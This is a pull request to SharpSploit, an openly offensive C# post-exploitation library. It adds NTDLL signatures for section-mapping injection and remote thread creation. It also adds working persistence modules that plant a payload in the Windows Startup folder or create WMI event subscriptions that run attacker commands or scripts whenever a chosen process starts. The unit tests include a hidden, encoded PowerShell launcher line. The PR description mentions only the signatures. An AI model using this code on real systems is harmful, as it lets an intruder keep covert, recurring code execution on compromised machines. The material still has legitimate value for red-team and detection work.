### PR TITLE
Added NTDLL P/Invoke signatures for memory Sections & universal thread creation

### DIFF
--- a/SharpSploit.Tests/SharpSploit.Tests/Persistence/StartupTests.cs
+++ b/SharpSploit.Tests/SharpSploit.Tests/Persistence/StartupTests.cs
@@ -1,0 +1,26 @@
+﻿// Author: Ryan Cobb (@cobbr_io)
+// Project: SharpSploit (https://github.com/cobbr/SharpSploit)
+// License: BSD 3-Clause
+
+using System;
+using System.IO;
+using Microsoft.VisualStudio.TestTools.UnitTesting;
+
+using SharpSploit.Persistence;
+
+namespace SharpSploit.Tests.Persistence
+{
+    [TestClass]
+    public class StartupTests
+    {
+        [TestMethod]
+        public void InstallStartupScript()
+        {
+            string Payload = @"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -enc <blah>";
+            Startup.InstallStartup(Payload);
+
+            string FilePath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + $@"\Microsoft\Windows\Start Menu\Programs\Startup\startup.bat";
+            Assert.IsTrue(File.Exists(FilePath));
+        }
+    }
+}

--- a/SharpSploit.Tests/SharpSploit.Tests/Persistence/WMITests.cs
+++ b/SharpSploit.Tests/SharpSploit.Tests/Persistence/WMITests.cs
@@ -1,0 +1,76 @@
+﻿// Author: Ryan Cobb (@cobbr_io)
+// Project: SharpSploit (https://github.com/cobbr/SharpSploit)
+// License: BSD 3-Clause
+
+using System.IO;
+using System.Threading;
+using System.Diagnostics;
+using Microsoft.VisualStudio.TestTools.UnitTesting;
+
+using SharpSploit.Persistence;
+
+namespace SharpSploit.Tests.Persistence
+{
+    [TestClass]
+    public class WMITests
+    {
+        private static Process StartNotepad()
+        {
+            ProcessStartInfo startInfo = new ProcessStartInfo();
+            startInfo.FileName = @"C:\Windows\System32\notepad.exe";
+            startInfo.WindowStyle = ProcessWindowStyle.Hidden;
+            return Process.Start(startInfo);
+        }
+
+        [TestMethod]
+        public void TestInstallWMICommandLine()
+        {
+            string filePath = @"C:\CommandLineTest.txt";
+            string command = $@"cmd /c ""echo ""Command Line Test"" > {filePath}""";
+
+            WMI.InstallWMIPersistence("CommandLineTest", WMI.EventFilter.ProcessStart, WMI.EventConsumer.CommandLine, command, "notepad.exe");
+
+            Process notepad = StartNotepad();
+            Thread.Sleep(3000);
+
+            Assert.IsTrue(File.Exists(filePath));
+        }
+
+        [TestMethod]
+        public void TestInstallWMIVBScript()
+        {
+            string filePath = @"C:\VBScriptTest.txt";
+            string vbscript = $@"
+Set objFSO=CreateObject(""Scripting.FileSystemObject"")
+outFile = ""{filePath}""
+Set objFile = objFSO.CreateTextFile(outFile, True)
+objFile.Write ""VBScript Test""
+objFile.Close";
+
+            WMI.InstallWMIPersistence("VBScriptTest", WMI.EventFilter.ProcessStart, WMI.EventConsumer.ActiveScript, vbscript, "notepad.exe", WMI.ScriptingEngine.VBScript);
+
+            Process notepad = StartNotepad();
+            Thread.Sleep(3000);
+
+            Assert.IsTrue(File.Exists(filePath));
+        }
+
+        [TestMethod]
+        public void TestInstallWMIJScript()
+        {
+            string filePath = @"C:\\JScriptTest.txt";
+            string jscript = $@"
+var myObject, newfile;
+myObject = new ActiveXObject(""Scripting.FileSystemObject"");
+newfile = myObject.CreateTextFile(""{filePath}"", false);
+";
+
+            WMI.InstallWMIPersistence("JScriptTest", WMI.EventFilter.ProcessStart, WMI.EventConsumer.ActiveScript, jscript, "notepad.exe", WMI.ScriptingEngine.JScript);
+
+            Process notepad = StartNotepad();
+            Thread.Sleep(3000);
+
+            Assert.IsTrue(File.Exists(filePath));
+        }
+    }
+}

--- a/SharpSploit.Tests/SharpSploit.Tests/SharpSploit.Tests.csproj
+++ b/SharpSploit.Tests/SharpSploit.Tests/SharpSploit.Tests.csproj
@@ -63,6 +63,8 @@
     <Compile Include="Execution\ShellTests.cs" />
     <Compile Include="LateralMovement\DCOMTests.cs" />
     <Compile Include="LateralMovement\WMITests.cs" />
+    <Compile Include="Persistence\StartupTests.cs" />
+    <Compile Include="Persistence\WMITests.cs" />
     <Compile Include="Properties\AssemblyInfo.cs" />
   </ItemGroup>
   <ItemGroup>

--- a/SharpSploit/Execution/Win32.cs
+++ b/SharpSploit/Execution/Win32.cs
@@ -205,11 +205,11 @@ namespace SharpSploit.Execution
                 PROCESS_VM_WRITE = 0x0020,
                 SYNCHRONIZE = 0x00100000
             }
-    }
+        }
 
         public static class Netapi32
         {
-            [StructLayout(LayoutKind.Sequential, CharSet=CharSet.Unicode)]
+            [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
             public struct LOCALGROUP_USERS_INFO_0
             {
                 [MarshalAs(UnmanagedType.LPWStr)] internal string name;
@@ -1038,7 +1038,7 @@ namespace SharpSploit.Execution
 
         public class WinCred
         {
-            #pragma warning disable 0618
+#pragma warning disable 0618
             [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
             public struct _CREDENTIAL
             {
@@ -1054,7 +1054,7 @@ namespace SharpSploit.Execution
                 public IntPtr TargetAlias;
                 public IntPtr UserName;
             }
-            #pragma warning restore 0618
+#pragma warning restore 0618
 
             public enum CRED_FLAGS : uint
             {
@@ -1172,22 +1172,22 @@ namespace SharpSploit.Execution
             //NTSTATUS: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-erref/596a1078-e883-4972-9bbc-49e60bebca55
             [DllImport("ntdll.dll")]
             public static extern IntPtr NtCreateThreadEx(
-                out IntPtr threadHandle, 
-                WinNT.ACCESS_MASK desiredAccess, 
-                IntPtr objectAttributes, 
-                IntPtr processHandle, 
-                IntPtr startAddress, 
-                IntPtr parameter, 
-                NT_CREATION_FLAGS creationFlags, 
-                int stackZeroBits, 
-                int sizeOfStack, 
-                int maximumStackSize, 
+                out IntPtr threadHandle,
+                WinNT.ACCESS_MASK desiredAccess,
+                IntPtr objectAttributes,
+                IntPtr processHandle,
+                IntPtr startAddress,
+                IntPtr parameter,
+                NT_CREATION_FLAGS creationFlags,
+                int stackZeroBits,
+                int sizeOfStack,
+                int maximumStackSize,
                 IntPtr attributeList
             );
 
             //Undocumented. Not the same as normal thread creation flags.
             //https://processhacker.sourceforge.io/doc/ntpsapi_8h_source.html
-            public enum NT_CREATION_FLAGS: ulong
+            public enum NT_CREATION_FLAGS : ulong
             {
                 CREATE_SUSPENDED = 0x00000001,
                 SKIP_THREAD_ATTACH = 0x00000002,

--- a/SharpSploit/Execution/Win32.cs
+++ b/SharpSploit/Execution/Win32.cs
@@ -52,6 +52,9 @@ namespace SharpSploit.Execution
                 string procName
             );
 
+            [DllImport("kernel32.dll", CharSet = CharSet.Auto)]
+            public static extern IntPtr GetModuleHandle(string lpModuleName);
+
             [DllImport("kernel32.dll")]
             public static extern void GetSystemInfo(
                 out WinBase._SYSTEM_INFO lpSystemInfo
@@ -1132,6 +1135,67 @@ namespace SharpSploit.Execution
                 ref WinNT._TOKEN_MANDATORY_LABEL TokenInformation,
                 Int32 TokenInformationLength
             );
+
+            [DllImport("ntdll.dll", SetLastError = true)]
+            public static extern uint NtCreateSection(
+                ref IntPtr SectionHandle,
+                uint DesiredAccess,
+                IntPtr ObjectAttributes,
+                ref ulong MaximumSize,
+                uint SectionPageProtection,
+                uint AllocationAttributes,
+                IntPtr FileHandle
+            );
+
+            [DllImport("ntdll.dll", SetLastError = true)]
+            public static extern uint NtMapViewOfSection(
+                IntPtr SectionHandle,
+                IntPtr ProcessHandle,
+                ref IntPtr BaseAddress,
+                IntPtr ZeroBits,
+                IntPtr CommitSize,
+                IntPtr SectionOffset,
+                ref uint ViewSize,
+                uint InheritDisposition,
+                uint AllocationType,
+                uint Win32Protect
+            );
+
+            [DllImport("ntdll.dll", SetLastError = true)]
+            public static extern UIntPtr NtUnmapViewOfSection(
+                IntPtr hProc,
+                IntPtr baseAddr
+            );
+
+            //Undocumented. Created by Microsoft to be a universal, cross-session solution for remote thread creation.
+            //Returns NTSTATUS, a VERY BROAD set of error codes that is too large to define here.
+            //NTSTATUS: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-erref/596a1078-e883-4972-9bbc-49e60bebca55
+            [DllImport("ntdll.dll")]
+            public static extern IntPtr NtCreateThreadEx(
+                out IntPtr threadHandle, 
+                WinNT.ACCESS_MASK desiredAccess, 
+                IntPtr objectAttributes, 
+                IntPtr processHandle, 
+                IntPtr startAddress, 
+                IntPtr parameter, 
+                NT_CREATION_FLAGS creationFlags, 
+                int stackZeroBits, 
+                int sizeOfStack, 
+                int maximumStackSize, 
+                IntPtr attributeList
+            );
+
+            //Undocumented. Not the same as normal thread creation flags.
+            //https://processhacker.sourceforge.io/doc/ntpsapi_8h_source.html
+            public enum NT_CREATION_FLAGS: ulong
+            {
+                CREATE_SUSPENDED = 0x00000001,
+                SKIP_THREAD_ATTACH = 0x00000002,
+                HIDE_FROM_DEBUGGER = 0x00000004,
+                HAS_SECURITY_DESCRIPTOR = 0x00000010,
+                ACCESS_CHECK_IN_TARGET = 0x00000020,
+                INITIAL_THREAD = 0x00000080
+            }
         }
     }
 }

--- a/SharpSploit/Persistence/Startup.cs
+++ b/SharpSploit/Persistence/Startup.cs
@@ -1,0 +1,37 @@
+﻿// Author: Ryan Cobb (@cobbr_io)
+// Project: SharpSploit (https://github.com/cobbr/SharpSploit)
+// License: BSD 3-Clause
+
+using System;
+using System.IO;
+
+namespace SharpSploit.Persistence
+{
+    /// <summary>
+    /// Startup is a class for abusing the Windows Startup folder to establish peristence.
+    /// </summary>
+    public class Startup
+    {
+        /// <summary>
+        /// Installs a payload into the current users startup folder.
+        /// </summary>
+        /// <author>Daniel Duggan (@_RastaMouse)</author>
+        /// <param name="Payload">Payload to write to a file.</param>
+        /// <param name="FileName">Name of the file to write. Defaults to "startup.bat"</param>
+        /// <returns>True if execution succeeds, false otherwise.</returns>
+        public static bool InstallStartup(string Payload, string FileName = "startup.bat")
+        {
+            try
+            {
+                string FilePath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + $@"\Microsoft\Windows\Start Menu\Programs\Startup\{FileName}";
+                File.WriteAllText(FilePath, Payload);
+                return true;
+            }
+            catch (Exception e)
+            {
+                Console.Error.WriteLine("Failed: " + e.Message);
+            }
+            return false;
+        } 
+    }
+}

--- a/SharpSploit/Persistence/WMI.cs
+++ b/SharpSploit/Persistence/WMI.cs
@@ -1,0 +1,137 @@
+﻿// Author: Ryan Cobb (@cobbr_io)
+// Project: SharpSploit (https://github.com/cobbr/SharpSploit)
+// License: BSD 3-Clause
+
+using System;
+using System.Management;
+
+namespace SharpSploit.Persistence
+{
+    /// <summary>
+    /// WMI is a class for abusing WMI Event Subscriptions to establish peristence. Requires elevation.
+    /// </summary>
+    public class WMI
+    {
+        /// <summary>
+        /// Creates a WMI Event, Consumer and Binding to execuate a payload.
+        /// </summary>
+        /// <author>Daniel Duggan (@_RastaMouse)</author>
+        /// <returns>Bool. True if execution succeeds, false otherwise.</returns>
+        /// <remarks>
+        /// Credit to Andrew Luke (@sw4mp_f0x) for PowerLurk and
+        /// Dominic Chell (@domchell) for Persistence Part 3 – WMI Event Subscription.
+        /// </remarks>
+        /// <param name="EventName">An arbitrary name to be assigned to the new WMI Event.</param>
+        /// <param name="EventFilter">Specifies the event trigger to use. The options are ProcessStart.</param>
+        /// <param name="EventConsumer">Specifies the action to carry out. The options are CommandLine (OS Command) and ActiveScript (JScript or VBScript).</param>
+        /// <param name="Payload">Specifies the CommandLine or ActiveScript payload to run.</param>
+        /// <param name="ProcessName">Specifies the process name when the ProcessStart trigger is selected. Defaults to notepad.exe.</param>
+        /// <param name="ScriptingEngine">Specifies the scripting engine when the ActiveScript consumer is selected. Defaults to VBScript.</param>
+        public static bool InstallWMIPersistence(string EventName, EventFilter EventFilter, EventConsumer EventConsumer, string Payload, string ProcessName = "notepad.exe", ScriptingEngine ScriptingEngine = ScriptingEngine.VBScript)
+        {
+            try
+            {
+                ManagementObject eventFilter = CreateEventFilter(EventName, EventFilter, ProcessName);
+                ManagementObject eventConsumer = CreateEventConsumer(EventName, EventConsumer, Payload, ScriptingEngine);
+                CreateBinding(eventFilter, eventConsumer);
+                return true;
+            }
+            catch (Exception e)
+            {
+                Console.Error.WriteLine("WMI Exception: " + e.Message);
+            }
+            return false;
+        }
+
+        private static ManagementObject CreateEventFilter(string EventName, EventFilter EventFilter, string ProcessName)
+        {
+            ManagementObject _EventFilter = null;
+            try
+            {
+                ManagementScope scope = new ManagementScope(@"\\.\root\subscription");
+                ManagementClass wmiEventFilter = new ManagementClass(scope, new ManagementPath("__EventFilter"), null);
+
+                string query = string.Empty;
+                if (EventFilter == EventFilter.ProcessStart)
+                {
+                    query = $@"SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName='{ProcessName}'";
+                }
+
+                WqlEventQuery wql = new WqlEventQuery(query);
+                _EventFilter = wmiEventFilter.CreateInstance();
+                _EventFilter["Name"] = EventName;
+                _EventFilter["Query"] = wql.QueryString;
+                _EventFilter["QueryLanguage"] = wql.QueryLanguage;
+                _EventFilter["EventNameSpace"] = @"root/cimv2";
+                _EventFilter.Put();
+            }
+            catch (Exception e)
+            {
+                Console.Error.WriteLine(e.Message);
+            }
+            return _EventFilter;
+        }
+
+        private static ManagementObject CreateEventConsumer(string ConsumerName, EventConsumer EventConsumer, string Payload, ScriptingEngine ScriptingEngine = ScriptingEngine.VBScript)
+        {
+            ManagementObject _EventConsumer = null;
+            try
+            {
+                ManagementScope scope = new ManagementScope(@"\\.\root\subscription");
+                if (EventConsumer == EventConsumer.CommandLine)
+                {
+                    _EventConsumer = new ManagementClass(scope, new ManagementPath("CommandLineEventConsumer"), null).CreateInstance();
+                    _EventConsumer["Name"] = ConsumerName;
+                    _EventConsumer["RunInteractively"] = false;
+                    _EventConsumer["CommandLineTemplate"] = Payload;
+                }
+                else if (EventConsumer == EventConsumer.ActiveScript)
+                {
+                    _EventConsumer = new ManagementClass(scope, new ManagementPath("ActiveScriptEventConsumer"), null).CreateInstance();
+                    _EventConsumer["Name"] = ConsumerName;
+
+                    if (ScriptingEngine == ScriptingEngine.JScript)
+                        _EventConsumer["ScriptingEngine"] = "JScript";
+                    else if (ScriptingEngine == ScriptingEngine.VBScript)
+                        _EventConsumer["ScriptingEngine"] = "VBScript";
+
+                    _EventConsumer["ScriptText"] = Payload;
+                }
+                _EventConsumer.Put();
+            }
+
+            catch (Exception e)
+            {
+                Console.Error.WriteLine(e.Message);
+            }
+            return _EventConsumer;
+        }
+
+        private static void CreateBinding(ManagementObject EventFilter, ManagementObject EventConsumer)
+        {
+            ManagementScope scope = new ManagementScope(@"\\.\root\subscription");
+            ManagementObject _Binding = new ManagementClass(scope, new ManagementPath("__FilterToConsumerBinding"), null).CreateInstance();
+
+            _Binding["Filter"] = EventFilter.Path.RelativePath;
+            _Binding["Consumer"] = EventConsumer.Path.RelativePath;
+            _Binding.Put();
+        }
+
+        public enum EventFilter
+        {
+            ProcessStart
+        }
+
+        public enum EventConsumer
+        {
+            CommandLine,
+            ActiveScript
+        }
+
+        public enum ScriptingEngine
+        {
+            JScript,
+            VBScript
+        }
+    }
+}

--- a/SharpSploit/SharpSploit.xml
+++ b/SharpSploit/SharpSploit.xml
@@ -1189,6 +1189,42 @@
             <param name="CLSID">Missing CLSID to abuse.</param>
             <param name="ExecutablePath">Path to the executable payload.</param>
         </member>
+        <member name="T:SharpSploit.Persistence.Startup">
+            <summary>
+            Startup is a class for abusing the Windows Startup folder to establish peristence.
+            </summary>
+        </member>
+        <member name="M:SharpSploit.Persistence.Startup.InstallStartup(System.String,System.String)">
+            <summary>
+            Installs a payload into the current users startup folder.
+            </summary>
+            <author>Daniel Duggan (@_RastaMouse)</author>
+            <param name="Payload">Payload to write to a file.</param>
+            <param name="FileName">Name of the file to write. Defaults to "startup.bat"</param>
+            <returns>True if execution succeeds, false otherwise.</returns>
+        </member>
+        <member name="T:SharpSploit.Persistence.WMI">
+            <summary>
+            WMI is a class for abusing WMI Event Subscriptions to establish peristence. Requires elevation.
+            </summary>
+        </member>
+        <member name="M:SharpSploit.Persistence.WMI.InstallWMIPersistence(System.String,SharpSploit.Persistence.WMI.EventFilter,SharpSploit.Persistence.WMI.EventConsumer,System.String,System.String,SharpSploit.Persistence.WMI.ScriptingEngine)">
+            <summary>
+            Creates a WMI Event, Consumer and Binding to execuate a payload.
+            </summary>
+            <author>Daniel Duggan (@_RastaMouse)</author>
+            <returns>Bool. True if execution succeeds, false otherwise.</returns>
+            <remarks>
+            Credit to Andrew Luke (@sw4mp_f0x) for PowerLurk and
+            Dominic Chell (@domchell) for Persistence Part 3 – WMI Event Subscription.
+            </remarks>
+            <param name="EventName">An arbitrary name to be assigned to the new WMI Event.</param>
+            <param name="EventFilter">Specifies the event trigger to use. The options are ProcessStart.</param>
+            <param name="EventConsumer">Specifies the action to carry out. The options are CommandLine (OS Command) and ActiveScript (JScript or VBScript).</param>
+            <param name="Payload">Specifies the CommandLine or ActiveScript payload to run.</param>
+            <param name="ProcessName">Specifies the process name when the ProcessStart trigger is selected. Defaults to notepad.exe.</param>
+            <param name="ScriptingEngine">Specifies the scripting engine when the ActiveScript consumer is selected. Defaults to VBScript.</param>
+        </member>
         <member name="T:SharpSploit.PrivilegeEscalation.Exchange">
             <summary>
             Exchange is a class for abusing Microsoft Exchange for privilege escalation.


### PR DESCRIPTION
Added P/Invoke signatures for the following functions in NTDLL.DLL: 
* NtCreateSection
* NtMapViewOfSection
* NtUnmapViewOfSection
* NtCreateThreadEx (Undocumented, so added links to useful docs)
* NT_CREATION_FLAGS (Special set of thread creation flags just for NtCreateThreadEx. Different from normal flags)